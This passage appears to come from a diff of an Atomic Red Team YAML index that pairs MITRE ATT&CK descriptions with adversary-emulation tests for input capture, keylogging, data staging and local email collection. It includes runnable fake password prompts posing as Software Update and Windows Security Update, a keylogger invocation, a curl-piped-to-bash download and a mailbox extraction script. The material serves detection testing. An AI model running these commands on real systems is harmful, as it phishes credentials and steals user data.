+ id: attack-pattern--a2029942-0a85-4947-b23c-ca434698171d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ modified: '2020-03-24T20:56:14.853Z'
+ created: '2020-02-11T18:58:45.908Z'
+ x_mitre_contributors:
+ - Matthew Molyett, @s1air, Cisco Talos
+ x_mitre_data_sources:
+ - PowerShell logs
+ - User interface
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials.
+
+ Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Windows
+ identifier: T1056.002
+ atomic_tests:
+ - name: AppleScript - Prompt User for Password
+ auto_generated_guid: 76628574-0bc1-4646-8fe2-8f4427b47d15
+ description: |
+ Prompt User for Password (Local Phishing)
+ Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
+ supported_platforms:
+ - macos
+ executor:
+ command: 'osascript -e ''tell app "System Preferences" to activate'' -e ''tell
+ app "System Preferences" to activate'' -e ''tell app "System Preferences"
+ to display dialog "Software Update requires that you type your password
+ to apply changes." & return & return default answer "" with icon 1 with
+ hidden answer with title "Software Update"''
+
+'
+ name: bash
+ - name: PowerShell - Prompt User for Password
+ auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
+ description: |
+ Prompt User for Password (Local Phishing) as seen in Stitch RAT. Upon execution, a window will appear for the user to enter their credentials.
+
+ Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
+ supported_platforms:
+ - windows
+ executor:
+ command: "# Creates GUI to prompt for password. Expect long pause before prompt
+ is available. \n$cred = $host.UI.PromptForCredential('Windows Security
+ Update', '',[Environment]::UserName, [Environment]::UserDomainName)\n# Using
+ write-warning to allow message to show on console as echo and other similar
+ commands are not visable from the Invoke-AtomicTest framework.\nwrite-warning
+ $cred.GetNetworkCredential().Password\n"
+ name: powershell
+ T1056:
+ technique:
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1056
+ url: https://attack.mitre.org/techniques/T1056
+ - external_id: CAPEC-569
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/569.html
+ - url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
+ description: 'Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth
+ look into keyloggers on Windows. Retrieved April 27, 2016.'
+ source_name: Adventures of a Keystroke
+ description: Adversaries may use methods of capturing user input to obtain credentials
+ or collect information. During normal system usage, users often provide credentials
+ to various different locations, such as login pages/portals or system dialog
+ boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential
+ API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving
+ the user into providing input into what they believe to be a genuine service
+ (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).
+ name: Input Capture
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ modified: '2020-10-21T01:31:35.760Z'
+ created: '2017-05-31T21:30:48.323Z'
+ x_mitre_version: '1.2'
+ x_mitre_contributors:
+ - John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_data_sources:
+ - Windows Registry
+ - Windows event logs
+ - User interface
+ - Process command-line parameters
+ - Process monitoring
+ - PowerShell logs
+ - Loaded DLLs
+ - Kernel drivers
+ - DLL monitoring
+ - Binary file metadata
+ - API monitoring
+ x_mitre_detection: 'Detection may vary depending on how input is captured but
+ may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
+ `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
+ monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059),
+ and ensuring no unauthorized drivers or kernel modules that could indicate
+ keylogging or API hooking are present.'
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - root
+ - User
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_is_subtechnique: false
+ atomic_tests: []
+ T1056.001:
+ technique:
+ id: attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4
+ description: "Adversaries may log user keystrokes to intercept credentials as
+ the user types them. Keylogging is likely to be used to acquire credentials
+ for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003)
+ efforts are not effective, and may require an adversary to intercept keystrokes
+ on a system for a substantial period of time before credentials can be successfully
+ captured.\n\nKeylogging is the most prevalent type of input capture, with
+ many different ways of intercepting keystrokes.(Citation: Adventures of a
+ Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing
+ keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004),
+ this focuses solely on API functions intended for processing keystroke data.\n*
+ Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n*
+ Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601)
+ may provide adversaries with hooks into the operating system of network devices
+ to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device
+ Attacks) "
+ name: Keylogging
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1056.001
+ url: https://attack.mitre.org/techniques/T1056/001
+ - external_id: CAPEC-568
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/568.html
+ - url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
+ description: 'Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth
+ look into keyloggers on Windows. Retrieved April 27, 2016.'
+ source_name: Adventures of a Keystroke
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ modified: '2020-10-21T01:30:56.227Z'
+ created: '2020-02-11T18:58:11.791Z'
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ - Network
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.1'
+ x_mitre_detection: 'Keyloggers may take many forms, possibly involving modification
+ to the Registry and installation of a driver, setting a hook, or polling to
+ intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`,
+ and `GetAsyncKeyState`.(Citation: Adventures of a Keystroke) Monitor the Registry
+ and file system for such changes, monitor driver installs, and look for common
+ keylogging API calls. API calls alone are not an indicator of keylogging,
+ but may provide behavioral data that is useful when combined with other information
+ such as new files written to disk and unusual processes.'
+ x_mitre_permissions_required:
+ - Administrator
+ - root
+ - SYSTEM
+ - User
+ x_mitre_data_sources:
+ - Windows Registry
+ - Process monitoring
+ - API monitoring
+ identifier: T1056.001
+ atomic_tests:
+ - name: Input Capture
+ auto_generated_guid: d9b633ca-8efb-45e6-b838-70f595c6ae26
+ description: |
+ Utilize PowerShell and external resource to capture keystrokes
+ [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1)
+ Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1)
+
+ Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and output to key.log.
+ supported_platforms:
+ - windows
+ input_arguments:
+ filepath:
+ description: Name of the local file, include path.
+ type: Path
+ default: "$env:TEMP\\key.log"
+ executor:
+ command: |
+ Set-Location $PathToAtomicsFolder
+ .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath}
+ cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore
+
+'
+ name: powershell
+ elevation_required: true
+ T1557.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1557.001
+ url: https://attack.mitre.org/techniques/T1557/001
+ - url: https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution
+ description: Wikipedia. (2016, July 7). Link-Local Multicast Name Resolution.
+ Retrieved November 17, 2017.
+ source_name: Wikipedia LLMNR
+ - url: https://technet.microsoft.com/library/cc958811.aspx
+ description: Microsoft. (n.d.). NetBIOS Name Resolution. Retrieved November
+ 17, 2017.
+ source_name: TechNet NetBIOS
+ - source_name: byt3bl33d3r NTLM Relaying
+ url: https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
+ description: Salvati, M. (2017, June 2). Practical guide to NTLM Relaying
+ in 2017 (A.K.A getting a foothold in under 5 minutes). Retrieved February
+ 7, 2019.
+ - source_name: Secure Ideas SMB Relay
+ url: https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html
+ description: Kuehn, E. (2018, April 11). Ever Run a Relay? Why SMB Relays
+ Should Be On Your Mind. Retrieved February 7, 2019.
+ - url: https://github.com/nomex/nbnspoof
+ description: Nomex. (2014, February 7). NBNSpoof. Retrieved November 17, 2017.
+ source_name: GitHub NBNSpoof
+ - url: https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response
+ description: Francois, R. (n.d.). LLMNR Spoofer. Retrieved November 17, 2017.
+ source_name: Rapid7 LLMNR Spoofer
+ - url: https://github.com/SpiderLabs/Responder
+ description: Gaffie, L. (2016, August 25). Responder. Retrieved November 17,
+ 2017.
+ source_name: GitHub Responder
+ - url: https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning
+ description: 'Sternstein, J. (2013, November). Local Network Attacks: LLMNR
+ and NBT-NS Poisoning. Retrieved November 17, 2017.'
+ source_name: Sternsecurity LLMNR-NBTNS
+ - url: https://github.com/Kevin-Robertson/Conveigh
+ description: Robertson, K. (2016, August 28). Conveigh. Retrieved November
+ 17, 2017.
+ source_name: GitHub Conveigh
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: LLMNR/NBT-NS Poisoning and SMB Relay
+ description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
+ spoof an authoritative source for name resolution to force communication with
+ an adversary controlled system. This activity may be used to collect or relay
+ authentication materials. \n\nLink-Local Multicast Name Resolution (LLMNR)
+ and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve
+ as alternate methods of host identification. LLMNR is based upon the Domain
+ Name System (DNS) format and allows hosts on the same local link to perform
+ name resolution for other hosts. NBT-NS identifies systems on a local network
+ by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)\n\nAdversaries
+ can spoof an authoritative source for name resolution on a victim network
+ by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know
+ the identity of the requested host, effectively poisoning the service so that
+ the victims will communicate with the adversary controlled system. If the
+ requested host belongs to a resource that requires identification/authentication,
+ the username and NTLMv2 hash will then be sent to the adversary controlled
+ system. The adversary can then collect the hash information sent over the
+ wire through tools that monitor the ports for traffic or through [Network
+ Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes
+ offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to
+ obtain the plaintext passwords. In some cases where an adversary has access
+ to a system that is in the authentication path between systems or when automated
+ scans that use credentials attempt to authenticate to an adversary controlled
+ system, the NTLMv2 hashes can be intercepted and relayed to access and execute
+ code against a target system. The relay step can happen in conjunction with
+ poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation:
+ Secure Ideas SMB Relay)\n\nSeveral tools exist that can be used to poison
+ name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174).
+ (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub
+ Responder)"
+ id: attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-03-31T13:54:08.239Z'
+ created: '2020-02-11T19:08:51.677Z'
+ x_mitre_contributors:
+ - Eric Kuehn, Secure Ideas
+ - Matthew Demaske, Adaptforward
+ x_mitre_data_sources:
+ - Windows event logs
+ - Windows Registry
+ - Packet capture
+ - Netflow/Enclave netflow
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Monitor HKLM\Software\Policies\Microsoft\Windows NT\DNSClient for changes to the "EnableMulticast" DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)
+
+ Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.
+
+ Deploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ atomic_tests: []
+ T1074.001:
+ technique:
+ created: '2020-03-13T21:13:10.467Z'
+ modified: '2020-05-26T19:23:54.854Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ type: attack-pattern
+ id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+ description: Adversaries may stage collected data in a central location or directory
+ on the local system prior to Exfiltration. Data may be kept in separate files
+ or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560).
+ Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106)
+ and bash may be used to copy data into a staging location.
+ name: Local Data Staging
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1074.001
+ url: https://attack.mitre.org/techniques/T1074/001
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_detection: |-
+ Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
+
+ Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ identifier: T1074.001
+ atomic_tests:
+ - name: Stage data from Discovery.bat
+ auto_generated_guid: 107706a5-6f9f-451a-adae-bab8c667829f
+ description: |
+ Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution,
+ verify that the file is saved in the temp directory.
+ supported_platforms:
+ - windows
+ input_arguments:
+ output_file:
+ description: Location to save downloaded discovery.bat file
+ type: Path
+ default: "$env:TEMP\\discovery.bat"
+ executor:
+ command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat"
+ -OutFile #{output_file}
+
+'
+ cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore
+
+'
+ name: powershell
+ - name: Stage data from Discovery.sh
+ auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066
+ description: 'Utilize curl to download discovery.sh and execute a basic information
+ gathering shell script
+
+'
+ supported_platforms:
+ - linux
+ - macos
+ input_arguments:
+ output_file:
+ description: Location to save downloaded discovery.bat file
+ type: Path
+ default: "/tmp/T1074.001_discovery.log"
+ executor:
+ command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh
+ | bash -s > #{output_file}
+
+'
+ name: bash
+ - name: Zip a Folder with PowerShell for Staging in Temp
+ auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a
+ description: |
+ Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip
+ was placed in the temp directory.
+ supported_platforms:
+ - windows
+ input_arguments:
+ output_file:
+ description: Location to save zipped file or folder
+ type: Path
+ default: "$env:TEMP\\Folder_to_zip.zip"
+ input_file:
+ description: Location of file or folder to zip
+ type: Path
+ default: PathToAtomicsFolder\T1074.001\bin\Folder_to_zip
+ executor:
+ command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file}
+ -Force
+
+'
+ cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore
+
+'
+ name: powershell
+ T1114.001:
+ technique:
+ created: '2020-02-19T18:46:06.098Z'
+ modified: '2020-03-24T17:59:20.983Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ type: attack-pattern
+ id: attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004
+ description: |-
+ Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
+
+ Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\Users\\Documents\Outlook Files` or `C:\Users\\AppData\Local\Microsoft\Outlook`.(Citation: Microsoft Outlook Files)
+ name: Local Email Collection
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1114.001
+ url: https://attack.mitre.org/techniques/T1114/001
+ - source_name: Outlook File Sizes
+ url: https://practical365.com/clients/office-365-proplus/outlook-cached-mode-ost-file-sizes/
+ description: N. O'Bryan. (2018, May 30). Managing Outlook Cached Mode and
+ OST File Sizes. Retrieved February 19, 2020.
+ - source_name: Microsoft Outlook Files
+ url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
+ description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
+ .ost). Retrieved February 19, 2020.
+ x_mitre_platforms:
+ - Windows
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ - Authentication logs
+ - Mail server
+ x_mitre_detection: Monitor processes and command-line arguments for actions
+ that could be taken to gather local email files. Monitor for unusual processes
+ accessing local email files. Remote access tools with built-in features may
+ interact directly with the Windows API to gather information. Information
+ may also be acquired through Windows system management tools such as [Windows
+ Management Instrumentation](https://attack.mitre.org/techniques/T1047) and
+ [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_permissions_required:
+ - User
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ identifier: T1114.001
+ atomic_tests:
+ - name: Email Collection with PowerShell Get-Inbox
+ auto_generated_guid: 3f1b5096-0139-4736-9b78-19bcb02bb1cb
+ description: |
+ Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration.
+ Successful execution will produce stdout message stating "Please be patient, this may take some time...". Upon completion, final output will be a mail.csv file.
+
+ Note: Outlook is required, but no email account necessary to produce artifacts.
+ supported_platforms:
+ - windows
+ input_arguments:
+ output_file:
+ description: Output file path
+ type: String
+ default: "$env:TEMP\\mail.csv"
+ file_path:
+ description: File path for Get-Inbox.ps1
+ type: String
+ default: PathToAtomicsFolder\T1114.001\src
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Get-Inbox.ps1 must be located at #{file_path}
+
+'
+ prereq_command: 'if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit
+ 1}
+
+'
+ get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/src/Get-Inbox.ps1"
+ -OutFile "#{file_path}\Get-Inbox.ps1"
+
+'
+ executor:
+ command: 'powershell -executionpolicy bypass -command #{file_path}\Get-Inbox.ps1
+ -file #{output_file}
+
+'
+ cleanup_command: 'Remove-Item #{output_file} -Force -ErrorAction Ignore
+
+'
+ name: powershell
+ T1185:
+ technique:
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1185
+ external_id: T1185
+ - url: https://en.wikipedia.org/wiki/Man-in-the-browser
+ description: Wikipedia. (2017, October 28). Man-in-the-browser. Retrieved
+ January 10, 2018.
+ source_name: Wikipedia Man in the Browser
+ - url: https://www.cobaltstrike.com/help-browser-pivoting
+ description: Mudge, R. (n.d.). Browser Pivoting. Retrieved January 10, 2018.
+ source_name: Cobalt Strike Browser Pivot
+ - url: https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses
+ description: De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME
+ EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL
+ BUSINESSES. Retrieved January 17, 2018.
+ source_name: ICEBRG Chrome Extensions
+ - url: https://cobaltstrike.com/downloads/csmanual38.pdf
+ description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
+ Retrieved May 24, 2017.
+ source_name: cobaltstrike manual
+ description: |-
+ Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. (Citation: Wikipedia Man in the Browser)
+
+ A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. (Citation: Cobalt Strike Browser Pivot) (Citation: ICEBRG Chrome Extensions)
+
+ Browser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication. (Citation: cobaltstrike manual)
+ name: Man in the Browser
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-07-14T19:39:44.590Z'
+ created: '2018-01-16T16:13:52.465Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Justin Warner, ICEBRG
+ x_mitre_data_sources:
+ - Authentication logs
+ - Packet capture
+ - Process monitoring
+ - API monitoring
+ x_mitre_detection: This is a difficult technique to detect because adversary
+ traffic would be masked by normal user traffic. No new processes are created
+ and no additional software touches disk. Authentication logs can be used to
+ audit logins to specific web applications, but determining malicious logins
+ versus benign logins may be difficult if activity matches typical user behavior.
+ Monitor for process injection against browser applications
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_platforms:
+ - Windows
+ atomic_tests: []
+ T1557:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1557
+ url: https://attack.mitre.org/techniques/T1557
+ - external_id: CAPEC-94
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/94.html
+ - source_name: Rapid7 MiTM Basics
+ url: https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/
+ description: Rapid7. (n.d.). Man-in-the-Middle (MITM) Attacks. Retrieved March
+ 2, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Man-in-the-Middle
+ description: |-
+ Adversaries may attempt to position themselves between two or more networked devices using a man-in-the-middle (MiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)
+
+ Adversaries may leverage the MiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service.
+ id: attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-10-16T15:19:48.733Z'
+ created: '2020-02-11T19:07:12.114Z'
+ x_mitre_contributors:
+ - Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project
+ x_mitre_detection: Monitor network traffic for anomalies associated with known
+ MiTM behavior. Consider monitoring for modifications to system configuration
+ files involved in shaping network traffic flow.
+ x_mitre_data_sources:
+ - File monitoring
+ - Netflow/Enclave netflow
+ - Packet capture
+ x_mitre_permissions_required:
+ - User
+ x_mitre_version: '1.1'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ atomic_tests: []
+ T1602.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1602.002
+ url: https://attack.mitre.org/techniques/T1602/002
+ - source_name: US-CERT TA18-106A Network Infrastructure Devices 2018
+ url: https://us-cert.cisa.gov/ncas/alerts/TA18-106A
+ description: US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors
+ Targeting Network Infrastructure Devices. Retrieved October 19, 2020.
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
+ - source_name: US-CERT TA18-068A 2018
+ url: https://www.us-cert.gov/ncas/alerts/TA18-086A
+ description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
+ by Cyber Actors. Retrieved October 2, 2019.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Network Device Configuration Dump
+ description: "Adversaries may access network configuration files to collect
+ sensitive data about the device and the network. The network configuration
+ is a file containing parameters that determine the operation of the device.
+ The device typically stores an in-memory copy of the configuration while operating,
+ and a separate configuration on non-volatile storage to load after device
+ reset. Adversaries can inspect the configuration files to reveal information
+ about the target network and its layout, the network device and its software,
+ or identifying legitimate accounts and credentials for later use.\n\nAdversaries
+ can use common management tools and protocols, such as Simple Network Management
+ Protocol (SNMP) and Smart Install (SMI), to access network configuration files.
+ (Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) (Citation:
+ Cisco Blog Legacy Device Attacks) These tools may be used to query specific
+ data from a configuration repository or configure the device to export the
+ configuration for later analysis. "
+ id: attack-pattern--52759bf1-fe12-4052-ace6-c5b0cf7dd7fd
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-10-22T01:45:55.144Z'
+ created: '2020-10-20T00:08:21.745Z'
+ x_mitre_data_sources:
+ - Netflow/Enclave netflow
+ - Network protocol analysis
+ - Packet capture
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
+ or networks. Configure signatures to identify strings that may be found in
+ a network device configuration. (Citation: US-CERT TA18-068A 2018)'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ atomic_tests: []
+ T1074.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1074.002
+ url: https://attack.mitre.org/techniques/T1074/002
+ - source_name: Mandiant M-Trends 2020
+ url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
